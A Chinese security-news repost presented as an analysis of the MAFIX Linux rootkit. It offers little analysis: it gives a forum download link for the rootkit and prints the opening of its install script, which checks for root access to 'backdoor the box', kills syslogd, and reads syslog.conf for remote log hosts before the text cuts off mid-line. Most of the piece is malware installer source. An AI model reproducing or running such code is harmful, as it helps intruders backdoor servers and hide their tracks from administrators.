当前位置:七道奇文章资讯系统安全Linux安全
日期:2011-07-13 16:44:00  来源:本站整理

MAFIX - Linux 2.6 rootkit解析[Linux安全]

赞助商链接



  本文“MAFIX - Linux 2.6 rootkit解析[Linux安全]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

MAFIX - Linux 2.6 rootkit

这后门很贱,服务器中过一次,属于这个后门的改版.那个增添了模块.

下载地址:

https://forum.eviloctal.com/attachment.php?aid=13419

内容:

MAXFIX

---HOW-TO

---mafix

---mafixlibs 

---root

下面为root的内容,也就是安装脚本.

#!/bin/bash

######################

# mafix 0.2          #

# fud 2009/07/15     #

######################

BASEDIR=`pwd`

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

BLK=' [1;30m'

MAG=' [1;35m'

CYN=' [1;30m'

RED='^[[1;32m'

DMAG=' [1;37m'

RES=' [0m'

echo "${CYN}      ___           ___           ___    ${DMAG}           ${CYN}      ___     ${RES}"

echo "${CYN}     /__/\         /  /\         /  /\   ${DMAG}   ___     ${CYN}     /__/|    ${RES}"

echo "${CYN}    |  |::\       /  /::\       /  /:/_  ${DMAG}  /  /\    ${CYN}    |  |:|    ${RES}"

echo "${CYN}    |  |:|:\     /  /:/\:\     /  /:/ /\ ${DMAG} /  /:/    ${CYN}    |  |:|    ${RES}"

echo "${CYN}  __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ ${DMAG}/__/::\    ${CYN}  __|__|:|    ${RES}"

echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}"

echo "${CYN} \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/   ${DMAG}   \  \:\/\ ${CYN}   ~\~~\::::/${RES}"

echo "${CYN}  \  \:\        \  \::/       \  \::/    ${DMAG}    \__\::/${CYN}     |~~|:|~~ ${RES}"

echo "${CYN}   \  \:\        \  \:\        \  \:\    ${DMAG}    /__/:/ ${CYN}     |  |:|   ${RES}"

echo "${CYN}    \  \:\        \  \:\        \  \:\   ${DMAG}    \__\/  ${CYN}     |  |:|   ${RES}"

echo "${CYN}     \__\/         \__\/         \__\/   ${DMAG}           ${CYN}     |__|/    ${RES}"

echo "${DMAG}${RES}"

echo "${DMAG}- the ferrari of rootkits - ${RES}"

sleep 5

echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"

tar zxf mafixlibs

if [ "$(whoami)" != "root" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"

   exit

fi

cd $BASEDIR

sleep 1

killall -9 syslogd >/dev/null 2>&1

startime=`date +%S`

echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"

SYSLOGCONF="/etc/syslog.conf"

REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`

if [ ! -z "$REMOTE" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"

        echo

        for host in $REMOTE; do

                echo -n "            "

                echo $host

        done

        ec
  以上是“MAFIX - Linux 2.6 rootkit解析[Linux安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:

  • MAFIX - Linux 2.6 rootkit解析
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        100%(1)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .